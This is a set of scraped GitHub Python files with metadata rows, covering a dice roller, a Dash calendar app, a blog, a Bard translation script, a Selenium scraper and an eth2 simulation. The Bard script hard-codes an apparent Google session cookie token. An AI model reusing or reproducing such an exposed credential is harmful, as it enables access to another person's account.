                    f"[Instruction] Did not understand the instruction: `{instruction}`"
                )
                self._errors.append(message)
    def _maybe_parse_dice(self, instruction):
        """
        Checks if the instruction is a dice roll
        :param str instruction: String to parse
        :return: Whether it was a match
        :rtype: bool
        """
        match = re.fullmatch(DICE_REGEX, instruction)
        if match is not None:
            qty = int(match.group("qty"))
            sides = int(match.group("sides"))
            for i in range(qty):
                self.dice.append(Die(sides))
            return True
        return False
    def _maybe_parse_action(self, instruction):
        """
        Checks if the instruction is an action call
        :param str instruction: String to parse
        :return: Whether it was a match
        :rtype: bool
        """
        # Simple actions have no value (adv/dis/crit)
        match = re.fullmatch(SIMPLE_ACTION_REGEX, instruction)
        if match is not None:
            self.action = create_roll_action(self, instruction)
            self.action_counter += 1
            return True
        # Complex actions carry an amount (e.g. "kh3")
        match = re.fullmatch(COMPLEX_ACTION_REGEX, instruction)
        if match is not None:
            action_text = match.group("action")
            value = int(match.group("value"))
            self.action = create_roll_action(self, action_text, value)
            self.action_counter += 1
            return True
        return False
    def _maybe_parse_modifier(self, instruction):
        """
        Checks if the instruction is to apply a modifier
        :param str instruction: String to parse
        :return: Whether it was a match
        :rtype: bool
        """
        match = re.fullmatch(MODIFIER_REGEX, instruction)
        if match is not None:
            # The regex guarantees a leading +/- so int() parses the sign
            value = int(instruction)
            self.modifier = RollModifier(self, value)
            self.modifier_counter += 1
            return True
        return False
    def _maybe_parse_check(self, instruction):
        """
        Checks if the instruction is roll check/condition
        :param str instruction: String to parse
        :return: Whether it was a match
        :rtype: bool
        """
        match = re.fullmatch(CHECK_REGEX, instruction)
        if match is not None:
            comparator = match.group("comparator")
            value = int(match.group("value"))
            self.check = RollCheck(self, comparator, value)
            self.check_counter += 1
            return True
        return False
    # ----------------------------------------
    # Helpers: validation
    # ----------------------------------------
    def _validate(self):
        """Checks if our instance and its components are valid based on their states"""
        # Has dice
        if len(self.dice) == 0:
            message = "[Dice] You must provide at least one die (example: `1d6`)"
            self._errors.append(message)
        # Has 1 component of each max
        for text, counter in zip(
            ["Action", "Modifier", "Check"],
            [self.action_counter, self.modifier_counter, self.check_counter],
        ):
            if counter > 1:
                message = f"[{text}] You can only declare 1 {text.lower()} (provided: `{counter}`)"
                self._errors.append(message)
        # We check components only if no error so far
        if len(self._errors) > 0:
            return
        for component in self.components:
            component.validate()
    # ----------------------------------------
    # Helpers: output
    # ----------------------------------------
    def _update_embed_with_dice_rolls(self, embed):
        """
        Adds a `Dice` recap to the embed
        :param Embed embed: The embed to update
        """
        # Group rolled values by die size, e.g. {6: [3, 5], 20: [17]}
        dice_per_sides = {}
        for die in self.dice:
            existing_list = dice_per_sides.get(die.sides, [])
            existing_list.append(die.value)
            dice_per_sides[die.sides] = existing_list
        lines = []
        total_score = 0
        for sides, values in dice_per_sides.items():
            line_score = sum(values)
            total_score += line_score
            string_values = [str(v) for v in values]
            line = f"[{len(values)}d{sides}]({', '.join(string_values)}) = {line_score}"
            lines.append(line)
        # Note: this is the raw dice total, before any component applies
        lines.append(f"# {total_score}")
        text = generate_discord_markdown_string(lines)
        embed.add_field(
            name="Dice rolls",
            value=text,
            inline=False,
        )
| Jordan-Kowal/discord-dice-roller | discord_dice_roller/utils/dice_roll.py | dice_roll.py | py | 23,842 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.compile",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 20,
... |
75065242274 | import dash
from dash_core_components.Tabs import Tabs
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output, State
import plotly.express as px
import datetime
import pandas as pd
import base64
# Python scripts
import aux_ as aux
import tasks
import os, sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
# import ../db.py
from calendar_class import Calendar
calendar = Calendar()
calendar.auto_schedule = True
now = datetime.datetime.now()
str_date = datetime.datetime.strftime(now, '%Y/%m/%d')
# App settings
app = dash.Dash(__name__,suppress_callback_exceptions=True,meta_tags=[{"name": "viewport", "content": "width=device-width, initial-scale=1"}])
app.title = aux.APP_TITLE
app.layout = html.Div([html.Br(),html.Div([html.H1(aux.APP_TITLE)],style={'text-align':'center'}),html.Br(),
dcc.Tabs(id="tabs-styled-with-inline", value='today', children=[
dcc.Tab(label='Què he de fer avui?', value='avui', style=aux.tab_style, selected_style=aux.tab_selected_style),
dcc.Tab(label='Afegeix tasca', value='add_task', style=aux.tab_style, selected_style=aux.tab_selected_style),
dcc.Tab(label='El meu perfil', value='profile', style=aux.tab_style, selected_style=aux.tab_selected_style),
], style=aux.tabs_styles),
html.Div(id='tabs-content-inline')
])
###############################################
# TASKS
###############################################
@app.callback(
    Output("tabs-styled-with-inline", "value"),
    [Input("submit-entry", "n_clicks")],
    [
        State("select-subject", "value"),
        State("select-activity", "value"),
        State("enter-task", "value"),
        State("enter-hours", "value"),
        State("date-picker", "date"),
        State("enter-time", "value"),
    ],
)
def register(submit_entry, select_subject, select_activity, enter_task, enter_hours,date_picker, enter_time):
    """Save the submitted task form as a calendar deadline, then switch tabs.

    NOTE(review): returns "today", which matches no tab value in the layout
    ('avui', 'add_task', 'profile') -- confirm the intended target tab.
    """
    if submit_entry:
        # date-picker emits YYYY-MM-DD; the calendar keys use YYYY/MM/DD
        date = date_picker.replace("-", "/")
        calendar.add_deadline(select_subject, select_activity, enter_task, date, enter_time, dedication=enter_hours)
        #print(submit_entry, select_subject, select_activity, enter_task, enter_hours, date_picker, enter_time)
        print(calendar.get_schedule())
        return "today"
    # No click yet: leave the current tab unchanged
    raise dash.exceptions.PreventUpdate
###############################################
# TODAY
###############################################
@app.callback(dash.dependencies.Output('label1', 'children'),
            [dash.dependencies.Input('interval1', 'n_intervals')])
def update_interval(n):
    """Refresh the clock label every interval tick.

    NOTE(review): the +12h shift looks like a leftover debugging offset
    (a matching '#BORRAR' marker exists in render_content) -- confirm
    before relying on the displayed time.
    """
    now = datetime.datetime.now()
    now += datetime.timedelta(hours= 12)
    return now
def state(str_date, hour):
    """Return one button style per scheduled task for the given date.

    A task scheduled at the current hour is highlighted, upcoming tasks get
    the normal style, and past tasks get the "ended" style.
    """
    styles = []
    for slot, task in calendar.schedule[str_date].items():
        task_hour = int(slot[0:2])
        if task_hour == hour:
            styles.append(aux.red_button_style)      # happening right now
        elif task_hour > hour:
            styles.append(aux.normal_button_style)   # still upcoming
        else:
            styles.append(aux.ended_button_style)    # already finished
    return styles
# Callback outputs built at import time; the callback later mutates the
# module-level `a`, but Dash registers outputs only once at startup
LLISTA = []
a = [dash.dependencies.Output('TIME', 'figure')] + LLISTA
@app.callback(a,
            [dash.dependencies.Input('label1', 'children')])
def time_clock(now):
    """Build the pie-chart 'clock' figure and the per-task button styles.

    NOTE(review): reassigning the global `a` inside the callback cannot
    change the outputs Dash already registered, and the Output ids use an
    "t" prefix (f"t{...}") while the buttons are created with plain
    str(task.date_time) -- both look like reasons this view misbehaves;
    confirm before changing.
    """
    # `now` is the ISO-ish string from update_interval: slice out HH:MM:SS
    time = now[11:19]
    global str_date
    str_date = now[0:10].replace("-", "/")
    # NOTE: `min` shadows the builtin of the same name
    min = int(time[-5:-3])
    hour = int(time[-8:-6])
    # Fraction of the current hour elapsed, as percentages for the pie
    fet = min/60*100
    falta = 100 - fet
    data = [['% Completat', fet],['% Pendent', falta]]
    df = pd.DataFrame(data,columns = ['Etiqueta', 'Percentatge'])
    fig = px.pie(df, hover_name="Etiqueta", hover_data={'Etiqueta':False,'Percentatge':False}, values='Percentatge', names='Etiqueta', color_discrete_sequence=["#00CC96","rgb(246,246,246)"])
    fig.update(layout_showlegend=False)
    fig.update_traces(textinfo='none',sort=False)
    global a
    if str_date in calendar.schedule.keys():
        LLISTA = [dash.dependencies.Output(f"t{task.date_time}", 'style') for _, task in calendar.schedule[str_date].items()]
        a = [dash.dependencies.Output('TIME', 'figure')] + LLISTA
        print(len(a))
        print(len(LLISTA))
        print(type(LLISTA))
        print(len([fig] + state(str_date, hour)))
    else:
        a = [dash.dependencies.Output('TIME', 'figure')] + []
    return [fig] + state(str_date, hour)
# MAIN
@app.callback(Output('tabs-content-inline', 'children'),
            Input('tabs-styled-with-inline', 'value'))
def render_content(tab):
    """Render the body of the currently selected tab."""
    if tab == 'avui':
        now = datetime.datetime.now()
        # +12h debug offset (the author's own marker says to remove it)
        now += datetime.timedelta(hours= 12) #BORRAR
        str_date = datetime.datetime.strftime(now, '%Y/%m/%d')
        lst=[]
        # Nothing scheduled today: show the congratulations screen
        if str_date not in calendar.schedule.keys():
            return html.Div([html.Div([html.H1("No tens res a fer avui!")],style={'text-align':'center'}), html.Img(src=aux.b64_image("img/felicitats!.png"))], style={'height':'70%','text-align':'center'})
        # One button per scheduled task for today
        for hour, task in calendar.schedule[str_date].items():
            lst.append( html.Div([html.Button(hour + " - "+ task.name, id=str(task.date_time),style=aux.normal_button_style),html.Br(),html.Br()]))
        return html.Div([html.Div([
            html.Div([html.Div([html.H2("Tasques:"),html.Div(lst)], style={'marginLeft': "5%",'marginRight': "5%"})], style={'width':'40%','text-align':'left','backgroundColor': 'rgb(153,153,153)','marginTop': 22,'marginBottom': 60,'marginLeft': 10}),
            html.Div([
                html.Div([dcc.Interval(id='interval1', interval=1000, n_intervals=0),html.Br(),html.H1(id='label1', children='',style={ 'textAlign': 'center', 'color': 'black'})]),
                dcc.Graph(id='TIME')], style={'width':'60%','text-align':'center'})],style={'display':'flex'}
            ),html.Div([html.Div("hl")], style={'width':'50%','text-align':'right'})])
    elif tab == 'add_task':
        return tasks.tasks_tab()
    elif tab == 'profile':
        # Profile tab not implemented yet
        return
if __name__ == '__main__':
app.run_server(debug=True) | danaecanillas/Calendari_TEA | app/app_nofunciona.py | app_nofunciona.py | py | 6,022 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
24142497222 | import webapp2
import jinja2
import os
from google.appengine.ext import db
# Jinja2 environment that loads templates from ./templates, with
# autoescaping enabled to prevent HTML injection
template_dir = os.path.join(os.path.dirname(__file__), "templates")
jinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),
                               autoescape=True)
class Entry(db.Model):
    """A single blog post stored in the App Engine datastore."""
    title = db.StringProperty(required = True)        # post title
    content = db.TextProperty(required=True)          # post body (long text)
    created = db.DateTimeProperty(auto_now_add=True)  # set once on creation
class Handler(webapp2.RequestHandler):
    """Base request handler with jinja2 template rendering helpers."""
    def write(self, *a, **kw):
        """Write raw output to the HTTP response."""
        self.response.out.write(*a, **kw)
    def render_str(self, template, **params):
        """Render the named template with params and return the string."""
        return jinja_env.get_template(template).render(params)
    def render(self, template, **kw):
        """Render the named template and write it to the response."""
        self.write(self.render_str(template, **kw))
class MainPage(Handler):
    """Root URL: forwards visitors to the blog front page."""
    def get(self):
        self.redirect('/blog')
class BlogHome(Handler):
    """Blog front page: lists recent entries and accepts new posts."""
    def render_base(self, title="", content="", error=""):
        """Render the page with the five most recent entries."""
        recent = db.GqlQuery("SELECT * from Entry ORDER BY created DESC LIMIT 5")
        self.render("blog.html", title=title, content=content, error=error, entries=recent)
    def get(self):
        self.render_base()
    def post(self):
        """Create an entry from the form, or re-render with an error."""
        title = self.request.get("title")
        content = self.request.get("content")
        if not (title and content):
            self.render_base(title, content, error="Need both title and content")
        else:
            entry = Entry(title=title, content=content)
            entry.put()
            self.redirect("/")
class NewPost(Handler):
    """Form page for creating a new blog entry."""
    def get(self, title="", content="", error=""):
        self.render("newpost.html")
    def post(self):
        """Save the entry and redirect to its permalink, or show an error."""
        title = self.request.get("title")
        content = self.request.get("content")
        if not (title and content):
            self.render("newpost.html", title=title, content=content,
                        error="Need both title and content")
        else:
            entry = Entry(title=title, content=content)
            entry.put()
            self.redirect("/blog/" + str(entry.key().id()))
class ViewPostHandler(Handler):
    """Displays a single blog entry by its numeric datastore id."""
    def get(self, id):
        entry = Entry.get_by_id(int(id), parent=None)
        # Fix: get_by_id returns None for an unknown id, which previously
        # crashed with an AttributeError (HTTP 500); answer 404 instead.
        if entry is None:
            self.error(404)
            self.write("Entry not found")
            return
        self.render("individual_post.html", title=entry.title, content=entry.content)
# URL routing table; the last route captures the numeric entry id
app = webapp2.WSGIApplication([
    ('/', MainPage),
    ('/newpost', NewPost),
    ('/blog',BlogHome),
    webapp2.Route('/blog/<id:\d+>', ViewPostHandler)
], debug=True)
| johnmccorkell/build-a-blog | main.py | main.py | py | 2,398 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "jinja2.Environment",
"line... |
from youtube_transcript_api import YouTubeTranscriptApi
from bardapi import Bard
import os
import requests
import pytube
#important notes: This tool can only translate up to a 2000-word transcript, or about a 10-minute video
#using dsdaniel park bardapi
#the link: https://github.com/dsdanielpark/Bard-API
#code
#input youtube video link
link = input("Youtube video link: ")
source = link + "?cc_load_policy=1"
yt = pytube.YouTube(source)
#divide the link into to part and only take the video id link into id
#NOTE: `id` shadows the Python builtin of the same name
id = source.split("v=", 2)[-1]
#check all the captions that was available or the videos has turn off caption
cc = YouTubeTranscriptApi.list_transcripts(id)
#print the available language
print("id: ", id, "\n")
print("available language: ")
for i, df in enumerate(cc):
    print(df)
#language in which to read the subtitles
lang = input("Language that you want to read from (iso 639-1 code): ")
#fetch the subtitles and store them in `transcript`
transcript = YouTubeTranscriptApi.get_transcript(id,languages=[lang, 'vi']) #second language is vietnamese
#write the whole transcript into lyrics.txt
with open("lyrics.txt", "w", encoding = 'utf-8') as f:
    for subtitle in transcript:
        text = subtitle['text']
        start = subtitle['start']
        duration = subtitle['duration']
        f.write(f"{text}\n") #if you want to write a timeline u can add {start} -> {start+duration} but when using bard it'll usually fail to translate
    #NOTE: redundant -- the `with` block already closes the file
    f.close()
#reopen the file for reading
f = open("lyrics.txt", "r")
#add the token. You can use your at __Secure-1PSID in bard.google.com
#SECURITY: hard-coded session credential committed to source; it should be
#rotated and loaded from an environment variable instead of the literal below
os.environ['_BARD_API_KEY'] = 'YQiLtpIxwMX_V3gqKce011fmUyY9L_KCvlyUITEhuhTLUa7RmNPGUwC8ta-nvEhwfuOi6A.'
token = 'YQiLtpIxwMX_V3gqKce011fmUyY9L_KCvlyUITEhuhTLUa7RmNPGUwC8ta-nvEhwfuOi6A.'
#this code is to make bard continue from the old conversation
session = requests.Session()
session.headers = {
    "Host": "bard.google.com",
    "X-Same-Domain": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 OPR/88.0.4390.60",
    "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8",
    "Origin": "https://bard.google.com",
    "Referer": "https://bard.google.com/",
}
session.cookies.set("__Secure-1PSID", token)
#start bard
bard = Bard(token=token, session=session)
#You should request bard to translate with the same language that you want to translate to
#(the prompt below asks, in Vietnamese, for a translation into Vietnamese)
bard.get_answer("dịch giúp tôi một đoạn văn sang tiếng việt được không")
#give the subtitle to bard
ans = bard.get_answer(f.read())['content']
#close the .txt file after using
f.close()
#print the answer
print(ans)
| huype1/playing-w-yt-and-bard | YT_translate_to_vietnamese.py | YT_translate_to_vietnamese.py | py | 2,807 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pytube.YouTube",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "youtube_transcript_api.YouTubeTranscriptApi.list_transcripts",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "youtube_transcript_api.YouTubeTranscriptApi",
"line_number": 20,
... |
42744791584 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import numpy as np
import pandas as pd
import math as mt
from IPython.display import Markdown, display
def printmd(string):
    """Render *string* as Markdown in the IPython/Jupyter output cell."""
    display(Markdown(string))
# In[2]:
def DectoBin(num):
    """Convert an integer to its 32-bit two's-complement binary string.

    Args:
        num: integer in the signed 32-bit range; negative values are encoded
            in two's complement, matching the original bit-twiddling loop.

    Returns:
        A 32-character string of '0'/'1'.
    """
    # Masking with 0xFFFFFFFF yields the two's-complement bit pattern for
    # negatives directly; format() zero-pads to the fixed 32-bit width.
    # Replaces the hand-rolled divide-by-2 loop + manual bit-flip pass.
    return format(num & 0xFFFFFFFF, "032b")
def BintoDec(num):
    """Convert a 32-bit two's-complement binary string to a signed int.

    Args:
        num: a string of 32 '0'/'1' characters (as produced by the companion
            encoder); the leading character is the sign bit.

    Returns:
        The signed integer value.
    """
    value = int(num, 2)
    # When the sign bit is set, the unsigned reading represents value - 2**32.
    return value - (1 << 32) if num[0] == "1" else value
class MyJaggedArray:
    """A jagged array backed by a simulated byte-addressed memory.

    Each of the ``JALen`` inner arrays owns a fixed 40-cell region
    (10 slots x 4 one-byte cells); every stored value is a 32-bit
    two's-complement number kept as four 8-character bit strings.
    All lengths and values are read interactively at construction time.
    """

    def __init__(self, JALen):
        # One cell per simulated byte; 40 bytes reserved per inner array.
        self.mem = [None] * (JALen * 40)
        self.JALen = JALen
        # Chosen length (1..10) of each inner array.
        self.inArrLenArr = [0] * JALen
        i = 0
        while i < self.JALen:
            inArrLen = int(input(f"Enter {i+1} Array Length :"))
            if not 0 < inArrLen <= 10:
                # Invalid length: warn and re-prompt for the same slot.
                print("Lenght must be between 1 to 10")
                continue
            self.inArrLenArr[i] = inArrLen
            for j in range(inArrLen):
                value = int(input(f"Enter {i+1}, {j+1} Values : "))
                self.setValuestoMem(DectoBin(value), i * 40 + j * 4)
            i += 1

    def setValuestoMem(self, data, index):
        """Split a 32-char bit string into four 8-bit cells starting at *index*."""
        for offset, start in enumerate(range(0, 32, 8)):
            self.mem[index + offset] = data[start:start + 8]

    def getAllValues(self):
        """Print every inner array, decoding each 4-cell word from memory."""
        printmd("<span style='color:green; font-size:22px'><b>My Jagged Array Values</b></span>")
        for i in range(self.JALen):
            base = i * 40
            print("Base Address is :", base)
            for j in range(self.inArrLenArr[i]):
                cell = base + j * 4
                word = "".join(self.mem[cell + k] for k in range(4))
                print(BintoDec(word), end=" ")
            print("")

    def printMem(self):
        """Dump every raw memory cell, one per line."""
        printmd("<span style='color:green; font-size:22px'><b>Memory</b></span>")
        for cell in self.mem:
            print(cell)
# In[3]:
# Prompt until a valid jagged-array length (1..10) is supplied.
while True:
    JALen = int(input("Enter Jaggaed Array Length : "))
    if JALen <= 0 or JALen > 10:
        print("Jagged Array Length must be Between 1 to 10")
    else:
        break
# Build the array (prompts interactively for every inner array) and show it.
obj = MyJaggedArray(JALen)
obj.getAllValues()
# In[4]:
# Dump the raw simulated memory cells.
obj.printMem()
# In[ ]:
| shahmeerrajput/WorkOnTensorflowNmpyPandas | DS Project Working.py | DS Project Working.py | py | 3,162 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "IPython.display.display",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "IPython.display.Markdown",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.absolute",
"line_number": 19,
"usage_type": "call"
}
] |
24946960553 | from selenium import webdriver
from time import sleep
from selenium.webdriver import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By

# Scrape the first "recent decision" document from the CA judiciary site.
chrome_options = Options()
chrome_options.add_argument("--headless")  # run the browser without a visible window
# BUG FIX: the configured Options object was created but never handed to the
# driver, so --headless had no effect; pass it explicitly.
browser = webdriver.Chrome(options=chrome_options)
browser.get("https://services.ca.judiciary.gov.ph/recentdecisions/")
sleep(3)
# Switch the results table to its 4th page-size option.
select50 = browser.find_element(By.XPATH, "/html/body/center/div[3]/form/div/div[3]/select/option[4]")
select50.click()
sleep(1)
# Open the "view PDF" cell of the first result row.
viewPDF = browser.find_element(By.XPATH,"/html/body/center/div[3]/form/div/div[2]/table/tbody/tr[1]/td[4]")
viewPDF.click()
sleep(2)
# Send Ctrl+S to the page (browser save shortcut).
browser.find_element(By.XPATH,'/html/body').send_keys(Keys.CONTROL, 's')
page_content = browser.page_source
# Save the content to a file.
# NOTE(review): page_source is the HTML of the current page, not the PDF's
# binary content — writing it to "1.pdf" will not produce a valid PDF file;
# confirm whether a real download path was intended.
with open('1.pdf', 'w', encoding='utf-8') as file:
    file.write(page_content)
sleep(10)
browser.quit()
| Namgiangvt12/Upwork | 50.0478-multithread.py | 50.0478-multithread.py | py | 911 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "selenium.webdriver.chrome.options.Options",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 11,
"usage_type": "name"
},
{
... |
12698763875 | import math
import soundfile as sf
import numpy as np

# Loop a short clip so the output file is at least 6 seconds long.
data, samplerate = sf.read('sineAmend.wav')
channels = len(data.shape)                 # 1 axis = mono, 2 axes = stereo frames
length_s = len(data) / float(samplerate)
if length_s < 6.0:
    # Whole repetitions required to reach the 6-second minimum.
    n = math.ceil(6 * samplerate / len(data))
    if channels == 2:
        data = np.tile(data, (n, 1))       # repeat frames, keep channel axis intact
    else:
        data = np.tile(data, n)
sf.write('new.wav', data, samplerate)
| Shri-0/Pedalboard-Shri | Py/PedalBoard/Sessions/PB-repeatAudio.py | PB-repeatAudio.py | py | 370 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "soundfile.read",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "math.ceil",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.tile",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.tile",
"line_number": 16... |
17745879141 | import aioitertools
import copy
class _SampleIterator:
    """Iterate several iterables in lockstep, yielding deep-copied tuples.

    Iteration stops as soon as any one of the underlying iterables is
    exhausted (like ``zip``); every yielded element is deep-copied so the
    consumer cannot mutate the producer's data.
    """

    _none = object()  # sentinel marking an exhausted sub-iterator

    def __init__(self, sample):
        self._iters = [iter(part) for part in sample]

    def __iter__(self):
        return self

    def __next__(self):
        values = tuple(next(it, self._none) for it in self._iters)
        if any(v is self._none for v in values):
            # At least one sub-iterator ran out: the whole batch is done.
            raise StopIteration()
        return tuple(copy.deepcopy(v) for v in values)
class _UnBatchIterator:
    """Async iterator that flattens batched samples into individual ones.

    Pulls batches from ``source_iter`` — either a tuple of per-field
    sequences or a single bare sequence — and yields one element per field
    at a time via a ``_SampleIterator``.
    """

    _none = object()  # sentinel; not referenced in this class (mirrors _SampleIterator)

    def __init__(self, source_iter):
        self._source_iter = source_iter
        self._batch = None    # _SampleIterator over the batch currently being drained
        self._squeeze = None  # True when the source yields bare (non-tuple) samples

    def __aiter__(self):
        return self

    async def __anext__(self):
        while self._source_iter is not None:
            if self._batch is None:
                # No batch in progress: pull the next one from the source.
                try:
                    sample = await aioitertools.next(self._source_iter)
                    is_tuple = isinstance(sample, tuple)
                    if not is_tuple:
                        # Normalize to a 1-tuple so _SampleIterator can zip it.
                        sample = (sample,)
                    self._batch = _SampleIterator(sample)
                    self._squeeze = not is_tuple
                except StopAsyncIteration:
                    # Source exhausted: drop the reference and propagate.
                    self._source_iter = None
                    raise
            try:
                sample = next(self._batch)
                # Un-wrap the 1-tuple when the source yielded bare samples.
                return sample[0] if self._squeeze else sample
            except StopIteration:
                # Current batch drained: loop around to fetch the next one.
                self._batch = None
        else:
            # while/else: reached only when the loop condition is false on
            # entry, i.e. the source was already exhausted on a prior call.
            raise StopAsyncIteration()
class UnBatchDataOperation:
    """Pipeline operation that flattens batched samples from *source*."""
    def __init__(self, *, source):
        # Upstream operation; must expose get_iter(session_id).
        self._source = source
    def get_iter(self, session_id):
        """Return an async iterator of un-batched samples for *session_id*."""
        return _UnBatchIterator(self._source.get_iter(session_id))
| isushik94/pytorch-data-api | src/torch_data/_ops/_unbatch.py | _unbatch.py | py | 1,695 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "copy.deepcopy",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "aioitertools.next",
"line_number": 38,
"usage_type": "call"
}
] |
1405363679 | import requests
import json

# Fetch the classname mapping gist; each useful line looks like
# "<left> = <right>".  Build a dict mapping the right-hand side of each
# pair to its left-hand side, then dump it as JSON.
x = requests.get("https://gist.githubusercontent.com/D-Brox/5ea0d9cec29c4921a9e397163f447646/raw/classes2.txt")
e = x.text.split("\n")
b = {}
for i in e:
    # Reverse the split pair so the text right of " = " becomes the key.
    a = i.split(" = ")[::-1]
    try:
        b[a[0]] = a[1]
    # BUG FIX: the bare `except:` also swallowed KeyboardInterrupt/SystemExit;
    # only an IndexError (line without " = ", e.g. a blank trailing line) is
    # expected here.
    except IndexError:
        print(i)
with open("classes.json", "w", encoding="utf-8") as f:
    json.dump(b, f)
{
"api_name": "requests.get",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 13,
"usage_type": "call"
}
] |
29544552626 | import time
import ssz
import py_ecc.bls as bls
from eth2.beacon._utils.hash import hash_eth2
from eth2.beacon.on_genesis import (
get_genesis_block,
)
from eth2.beacon.state_machines.forks.serenity.blocks import (
SerenityBeaconBlock,
)
from eth2.beacon.state_machines.forks.serenity.configs import SERENITY_CONFIG
from eth2.beacon.types.states import BeaconState
from beacon_utils import ( # noqa: F401
generate_genesis_state,
)
from networksim import (
NetworkSimulator,
)
from progress import progress
from sim_config import Config as p
from validator import Validator
#
# Global variables
#
# Deterministic validator private keys: each is derived from the hash of its
# index (first 4 bytes only), so every run reproduces the same validator set.
privkeys = tuple(int.from_bytes(
    hash_eth2(str(i).encode('utf-8'))[:4], 'big')
    for i in range(p.NUM_VALIDATORS)
)
keymap = {}  # pub -> priv
for i, k in enumerate(privkeys):
    # Derive the BLS public key; log every 50th key as a progress marker.
    keymap[bls.privtopub(k)] = k
    if i % 50 == 0:
        print("Generated %d keys" % i)
# Insertion-ordered list of all public keys.
pubkeys = list(keymap)
def simulation():
    """Run the beacon-chain network simulation end to end.

    Builds (or loads) a genesis state, creates one Validator agent per key in
    the module-level ``keymap``, wires them into a simulated network, then
    ticks the network for ``p.TOTAL_TICKS`` steps.  A parameter/result summary
    is printed when the run ends, whether normally or via an exception.
    """
    # Initialize NetworkSimulator
    network = NetworkSimulator(latency=p.LATENCY, reliability=p.RELIABILITY)
    network.time = p.INITIAL_TIMESTAMP
    # 1. Create genesis state
    print('Creating genesis state')
    config = SERENITY_CONFIG
    # The config is a namedtuple, so overrides go through _replace.
    config = config._replace(
        SLOTS_PER_EPOCH=p.SLOTS_PER_EPOCH,
        GENESIS_SLOT=2**32,
        GENESIS_EPOCH=2**32 // p.SLOTS_PER_EPOCH,
        TARGET_COMMITTEE_SIZE=8,
        SHARD_COUNT=16,
        MIN_ATTESTATION_INCLUSION_DELAY=2,
    )
    # Optionally regenerate the genesis-state fixture file before loading it.
    if p.GENERATE_STATE:
        generate_genesis_state(config, keymap, p.NUM_VALIDATORS)
    # The fixture stores the SSZ-encoded state as a hex string.
    with open('hundred_validators_state.txt', 'r') as f:
        state_bytes = f.read()
    state_bytes = bytes.fromhex(state_bytes)
    genesis_state = ssz.decode(state_bytes, BeaconState)
    genesis_block = get_genesis_block(
        genesis_state.root,
        genesis_slot=config.GENESIS_SLOT,
        block_class=SerenityBeaconBlock,
    )
    print('Genesis state created')
    # One Validator agent per (pubkey, privkey) pair, indexed by position.
    validators = [
        Validator(
            config,
            genesis_state,
            genesis_block,
            index,
            privkey,
            pubkey,
            network,
            time_offset=p.TIME_OFFSET,
        )
        for index, (pubkey, privkey) in enumerate(keymap.items())
    ]
    # 2. Register the agents and build the peer topology.
    network.agents = validators
    network.generate_peers(num_peers=p.NUM_PEERS)
    # 3. tick
    start_time = time.time()
    print(
        f'start head block slot = {validators[0].chain.get_canonical_head().slot}'
    )
    def print_result():
        # Dump every simulation parameter plus the wall-clock duration.
        print('------ [Simulation End] ------')
        print('====== Parameters ======')
        print('------ Measuration Parameters ------')
        print('Total ticks: {}'.format(p.TOTAL_TICKS))
        print('Simulation precision: {}'.format(p.PRECISION))
        print('------ System Parameters ------')
        print('Total validators num: {}'.format(p.NUM_VALIDATORS))
        print('------ Network Parameters ------')
        print('Network latency: {} sec'.format(p.LATENCY * p.PRECISION))
        print('Network reliability: {}'.format(p.RELIABILITY))
        print('Number of peers: {}'.format(p.NUM_PEERS))
        print('Number of shard peers: {}'.format(p.SHARD_NUM_PEERS))
        print('Target total shards TPS: {}'.format(p.TARGET_TOTAL_TPS))
        print('Mean tx arrival time: {}'.format(p.MEAN_TX_ARRIVAL_TIME))
        print('------ Validator Parameters ------')
        print('Validator clock offset: {}'.format(p.TIME_OFFSET))
        print('Probability of validator failure to make a block: {}'.format(
            p.PROB_CREATE_BLOCK_SUCCESS
        ))
        print('------ Result ------')
        # print_status()
        print("--- %s seconds ---" % (time.time() - start_time))
    try:
        for i in range(p.TOTAL_TICKS):
            # Print progress bar in stderr
            progress(i, p.TOTAL_TICKS, status='Simulating.....')
            network.tick()
            if i % 100 == 0:
                print('%d ticks passed' % i)
            # print_status()
    # Effectively a no-op re-raise: print_result still runs via finally, and
    # any exception propagates to the caller after the summary is printed.
    except Exception:
        raise
    finally:
        print_result()
    print('[END]')
    return
# Script entry point.
if __name__ == "__main__":
    simulation()
